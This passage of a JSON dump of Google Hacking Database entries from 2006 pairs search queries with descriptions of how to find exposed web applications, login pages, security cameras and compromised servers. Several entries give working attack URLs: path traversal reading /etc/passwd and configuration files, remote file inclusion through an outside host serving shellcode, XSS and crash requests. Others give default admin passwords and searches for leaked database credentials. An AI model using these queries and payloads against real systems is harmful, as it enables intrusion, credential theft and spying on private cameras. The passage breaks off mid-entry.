inurl:\"extras/update.php\" -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=../catalog/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&amp;readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006", "submited": "2006-04-15", "request": "inurl:\"extras/update.php\" intext:mysql.php -display", "id": 1329}, {"short description": "inurl:sysinfo.cgi ext:cgi", "long description": "dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results", "submited": "2006-04-15", "request": "inurl:sysinfo.cgi ext:cgi", "id": 1330}, {"short description": "inurl:perldiver.cgi ext:cgi", "long description": "dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&amp;alert(\"lol\")other reference:http://secunia.com/advisories/16888/", "submited": "2006-04-15", "request": "inurl:perldiver.cgi ext:cgi", "id": 1331}, {"short description": "inurl:tmssql.php ext:php mssql pear adodb  -cvs -akbk", "long description": "dork:inurl:tmssql.php ext:php mssql pear adodb  -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of  http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651", "submited": "2006-04-15", "request": "inurl:tmssql.php ext:php mssql pear adodb  -cvs -akbk", "id": 1332}, {"short description": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "long description": "dork: \"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje  poc: if register_globals = On &amp; magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&amp;data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside      references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526", "submited": "2006-04-15", "request": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "id": 1333}, {"short description": "intitle:\"IVC Control Panel\"", "long description": "this searches for security cameras, vendor site:http://www.ivcco.com/", "submited": "2006-04-18", "request": "intitle:\"IVC Control Panel\"", "id": 1334}, {"short description": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "long description": "more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index", "submited": "2006-04-19", "request": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "id": 1335}, {"short description": "intitle:\"MvBlog powered\"", "long description": "MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss", "submited": "2006-04-25", "request": "intitle:\"MvBlog powered\"", "id": 1336}, {"short description": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "long description": "Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps", "submited": "2006-04-25", "request": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "id": 1337}, {"short description": "Please enter a valid password! inurl:polladmin", "long description": "The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:\"Powered by PHP Poll Wizard\" | intitle:\"php poll wizard\"", "submited": "2006-04-25", "request": "Please enter a valid password! inurl:polladmin", "id": 1338}, {"short description": "\"Warning: Division by zero in\" \"on line\" -forum", "long description": "Just another error that reveals full paths.", "submited": "2006-04-25", "request": "\"Warning: Division by zero in\" \"on line\" -forum", "id": 1339}, {"short description": "inurl:resetcore.php ext:php", "long description": "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html", "submited": "2006-04-25", "request": "inurl:resetcore.php ext:php", "id": 1340}, {"short description": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\"  -help -forum", "long description": "This dork reveals logins to databases that were denied for some reason.", "submited": "2006-04-25", "request": "\"Warning: mysql_connect(): Access denied for user: &#039;*@*\" \"on line\"  -help -forum", "id": 1341}, {"short description": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "long description": "Just another error message.", "submited": "2006-04-25", "request": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "id": 1342}, {"short description": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "long description": "and another error. open it from cache when not working.", "submited": "2006-04-25", "request": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "id": 1343}, {"short description": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "long description": "another error message", "submited": "2006-04-25", "request": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "id": 1344}, {"short description": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "long description": "Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps", "submited": "2006-04-25", "request": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "id": 1345}, {"short description": "\"You have not provided a survey identification number\" ERROR -xoops.org \"please contact\"", "long description": "sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html", "submited": "2006-04-25", "request": "\"You have not provided a survey identification num", "id": 1346}, {"short description": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "long description": "it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps", "submited": "2006-04-25", "request": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "id": 1347}, {"short description": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "long description": "this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html", "submited": "2006-04-28", "request": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "id": 1348}, {"short description": "inurl:\"php121login.php\"", "long description": "\"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!\"", "submited": "2006-05-03", "request": "inurl:\"php121login.php\"", "id": 1349}, {"short description": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "long description": "Results include many varius Network activity logs", "submited": "2006-05-03", "request": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "id": 1350}, {"short description": "intitle:\"Employee Intranet Login\"", "long description": "Intranet login pages by decentrix.com", "submited": "2006-05-03", "request": "intitle:\"Employee Intranet Login\"", "id": 1351}, {"short description": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "long description": "File upload servers, dangerous if used in couple with mytrashmail.com", "submited": "2006-05-03", "request": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "id": 1352}, {"short description": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "long description": "Customer login pages\"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.\"", "submited": "2006-05-03", "request": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "id": 1353}, {"short description": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "long description": "\"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.\"", "submited": "2006-05-03", "request": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "id": 1354}, {"short description": "intitle:\"Apache Status\" \"Apache Server Status for\"", "long description": "New Apache Server Status Dork", "submited": "2006-05-03", "request": "intitle:\"Apache Status\" \"Apache Server Status for\"", "id": 1355}, {"short description": "(intitle:\"rymo  Login\")|(intext:\"Welcome to rymo\") -family", "long description": "\"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.\"", "submited": "2006-05-03", "request": "(intitle:\"rymo  Login\")|(intext:\"Welcome to rymo\") -family", "id": 1356}, {"short description": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "long description": "\"TrackerCam is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.\"", "submited": "2006-05-03", "request": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "id": 1357}, {"short description": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "long description": "More SquirrelMail Logins", "submited": "2006-05-03", "request": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "id": 1358}, {"short description": "intitle:\"TWIG Login\"", "long description": "\"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.\"", "submited": "2006-05-03", "request": "intitle:\"TWIG Login\"", "id": 1359}, {"short description": "intitle:IMP inurl:imp/index.php3", "long description": "Webmail Login pages for IMP\"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.\"", "submited": "2006-05-03", "request": "intitle:IMP inurl:imp/index.php3", "id": 1360}, {"short description": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "long description": "sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts.", "submited": "2006-05-03", "request": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "id": 1361}, {"short description": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "long description": "Login pages for SHOUTcast\"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. \"", "submited": "2006-05-03", "request": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "id": 1362}, {"short description": "intext:\"Target Multicast Group\" \"beacon\"", "long description": "\"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.\"see h**p://beacon.dast.nlanr.net", "submited": "2006-05-03", "request": "intext:\"Target Multicast Group\" \"beacon\"", "id": 1363}, {"short description": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "long description": "Logins for Forums powered by UBB.threads", "submited": "2006-05-03", "request": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "id": 1364}, {"short description": "intitle:\"Device Status Summary Page\" -demo", "long description": "hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... wooIncludes:Temperature (F)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:", "submited": "2006-05-03", "request": "intitle:\"Device Status Summary Page\" -demo", "id": 1365}, {"short description": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "long description": "Login Pages for WebMyStyle.\"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.\"", "submited": "2006-05-03", "request": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "id": 1366}, {"short description": "intitle:\"eXist Database Administration\" -demo", "long description": "Login Pages \"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.\"", "submited": "2006-05-03", "request": "intitle:\"eXist Database Administration\" -demo", "id": 1367}, {"short description": "intitle:\"Apache Tomcat\" \"Error Report\"", "long description": "Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error.", "submited": "2006-06-15", "request": "intitle:\"Apache Tomcat\" \"Error Report\"", "id": 1368}, {"short description": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "long description": "found this: a remote user can have access to some edit functionalities to \"modify\" html. Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705", "submited": "2006-05-04", "request": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "id": 1369}, {"short description": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "long description": "this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/", "submited": "2006-05-04", "request": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "id": 1370}, {"short description": "intitle:r57shell +uname -bbpress", "long description": "compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team", "submited": "2006-05-04", "request": "intitle:r57shell +uname -bbpress", "id": 1371}, {"short description": "intitle:\"iGuard Fingerprint Security System\"", "long description": "vendor:http://www.iguardus.com/dome information disclosure: employeers list &amp; free camera access", "submited": "2006-05-04", "request": "intitle:\"iGuard Fingerprint Security System\"", "id": 1372}, {"short description": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "long description": "just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=1348", "submited": "2006-05-04", "request": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "id": 1373}, {"short description": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "long description": "just more cameras vendor site: http://www.eyespyfx.com/", "submited": "2006-05-04", "request": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "id": 1374}, {"short description": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "long description": "this is for X7 Chat", "submited": "2006-05-04", "request": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "id": 1375}, {"short description": "inurl:cgi-bin/guestimage.html", "long description": "just more more MOBOTIX's", "submited": "2006-05-04", "request": "inurl:cgi-bin/guestimage.html", "id": 1376}, {"short description": "allinurl:tseekdir.cgi", "long description": "tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html", "submited": "2006-05-22", "request": "allinurl:tseekdir.cgi", "id": 1377}, {"short description": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "long description": "Badblue file sharing web server detection", "submited": "2006-05-23", "request": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "id": 1378}, {"short description": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "long description": "this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html", "submited": "2006-05-30", "request": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "id": 1379}, {"short description": "\"powered by pppblog v 0.3.(.)\"", "long description": "this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html", "submited": "2006-05-30", "request": "\"powered by pppblog v 0.3.(.)\"", "id": 1380}, {"short description": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "long description": "this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html", "submited": "2006-05-30", "request": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "id": 1381}, {"short description": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "long description": "this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory &amp; poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html", "submited": "2006-05-30", "request": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "id": 1382}, {"short description": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "long description": "this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory &amp; poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html", "submited": "2006-05-30", "request": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "id": 1383}, {"short description": "\"powered by ubbthreads\"", "long description": "forums powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded", "submited": "2006-06-02", "request": "\"powered by ubbthreads\"", "id": 1384}, {"short description": "intitle:\"SNC-RZ30 HOME\" -demo", "long description": "This search will reveal Sony's SNC-RZ30 IP camera's web interface.  Quite a few of these cameras have not been configured to deny you control.  These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results. SNC-CS3 SNC-RZ25SNC-DF40     SNC-RZ30SNC-DF70     SNC-VL10SNC-P1       SNC-Z20", "submited": "2006-06-22", "request": "intitle:\"SNC-RZ30\" -demo", "id": 1385}, {"short description": "allintitle: EverFocus | EDSR | EDSR400 Applet", "long description": "Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query.", "submited": "2006-06-25", "request": "allintitle: EverFocus | EDSR | EDSR400 Applet", "id": 1386}, {"short description": "allintitle:Edr1680 remote viewer", "long description": "Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake.", "submited": "2006-06-25", "request": "allintitle:Edr1680 remote viewer", "id": 1387}, {"short description": "allintitle:  EDR1600 login | Welcome", "long description": "Everfocus EDR1600", "submited": "2006-06-25", "request": "allintitle:  EDR1600 login | Welcome", "id": 1388}, {"short description": "allintitle:  EDR400 login | Welcome", "long description": "Everfocus EDR400", "submited": "2006-06-25", "request": "allintitle:  EDR400 login | Welcome", "id": 1389}, {"short description": "FlashChat v4.5.7", "long description": "This simple search brings up lots of online Flash Chat clients. Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is \"adminpass\" (Without the speech marks).", "submited": "2006-07-29", "request": "FlashChat v4.5.7", "id": 1390}, {"short description": "intitle:\"Divar Web Client\"", "long description": "Boshe/Divar Net Cameras. Uses ActiveX - IE only.", "submited": "2006-06-25", "request": "intitle:\"Divar Web Client\"", "id": 1391}, {"short description": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" |  \"intext:Select preset position\"", "long description": "No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows.", "submited": "2006-06-25", "request": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" |  \"intext:Select preset position\"", "id": 1392}, {"short description": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "long description": "No one search will reveal all Axis cameras. This is a variant for the 2xxx series.", "submited": "2006-06-25", "request": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "id": 1393}, {"short description": "intitle:\"BlueNet Video Viewer\"", "long description": "Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. Uses ActiveX.", "submited": "2006-06-25", "request": "intitle:\"BlueNet Video Viewer\"", "id": 1394}, {"short description": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "long description": "The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now.", "submited": "2006-06-29", "request": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "id": 1395}, {"short description": "intitle:Ampache intitle:\"love of music\"  password | login | \"Remember Me.\" -welcome", "long description": "Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC.", "submited": "2006-06-29", "request": "intitle:Ampache intitle:\"love of music\"  password | login | \"Remember Me.\" -welcome", "id": 1396}, {"short description": "allintitle:\"DVR login\"", "long description": "softwell Technology \"Wit-Eye\" DVR.Default user/pass is admin:adminRequires ActiveX", "submited": "2006-06-30", "request": "allintitle:\"DVR login\"", "id": 1397}, {"short description": "intitle:index.of.config", "long description": "These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. It can also contain information on various ports, security permisions..etc.", "submited": "2006-07-14", "request": "intitle:index.of.config", "id": 1398}, {"short description": "site:extremetracking.com inurl:\"login=\"", "long description": "The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses.", "submited": "2006-07-31", "request": "site:extremetracking.com inurl:\"login=\"", "id": 1399}, {"short description": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "long description": "surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins.", "submited": "2006-08-03", "request": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "id": 1400}, {"short description": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "long description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url.", "submited": "2006-08-03", "request": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "id": 1401}, {"short description": "(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(in", "long description": "silkyMail is a free internet email client, from www.cyrusoft.com, that runs in your browser. The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(inurl:\"silkymail/imp/login.php3\")http://www.google.com/search?num=100&amp;hl=en&amp;lr=&amp;safe=off&amp;q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&amp;btnG=Search", "submited": "2006-08-03", "request": "(intitle:\"SilkyMail by Cyrusoft International, Inc", "id": 1402}, {"short description": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "long description": "Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature.", "submited": "2006-08-10", "request": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "id": 1403}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "long description": "this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html", "submited": "2006-08-13", "request": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "id": 1404}, {"short description": "\"powered by xmb\"", "long description": "this is for XMB", "submited": "2006-08-13", "request": "\"powered by xmb\"", "id": 1405}, {"short description": "\"powered by minibb forum software\"", "long description": "This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=3944", "submited": "2006-08-13", "request": "\"powered by minibb forum software\"", "id": 1406}, {"short description": "inurl:eStore/index.cgi?", "long description": "this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd", "submited": "2006-08-13", "request": "inurl:eStore/index.cgi?", "id": 1407}, {"short description": "\"login: *\" \"password: *\" filetype:xls", "long description": "This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like \"password protected\", \"password services\" etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others.", "submited": "2006-09-06", "request": "\"login: *\" \"password= *\" filetype:xls", "id": 1408}, {"short description": "inurl:+:8443/login.php3", "long description": "Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) &amp; PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu", "submited": "2006-09-27", "request": "inurl:+:8443/login.php3", "id": 1409}, {"short description": "inurl:wrcontrollite", "long description": "Browse up to 16 security cameras at one time :)", "submited": "2006-09-11", "request": "inurl:wrcontrollite", "id": 1410}, {"short description": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "long description": "hxxp://evuln.com/vulns/106/summary.html", "submited": "2006-09-13", "request": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "id": 1411}, {"short description": "inurl:\"simplenews/admin\"", "long description": "hxxp://evuln.com/vulns/94/summary.html", "submited": "2006-09-13", "request": "inurl:\"simplenews/admin\"", "id": 1412}, {"short description": "inurl:\"/?pagename=AdministratorLogin\"", "long description": "Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up", "submited": "2006-09-20", "request": "inurl:\"/?pagename=AdministratorLogin\"", "id": 1413}, {"short description": "inurl:\"/?pagename=CustomerLogin\"", "long description": "Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up.", "submited": "2006-09-20", "request": "inurl:\"/?pagename=CustomerLogin\"", "id": 1414}, {"short description": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "long description": "h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices.", "submited": 